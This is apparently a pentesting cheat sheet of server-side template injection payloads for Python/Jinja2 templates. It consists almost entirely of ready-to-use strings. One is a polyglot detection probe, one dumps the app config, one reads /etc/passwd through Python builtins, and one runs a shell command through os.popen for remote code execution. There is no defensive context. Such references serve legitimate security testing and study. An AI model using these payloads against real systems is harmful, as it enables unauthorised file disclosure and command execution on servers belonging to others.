Identifying SSTI
${{<%[%'"}}%\.{{ config.items() }}{{ self.__init__.__globals__.__builtins__ }}LFI
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}RCE
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}Tool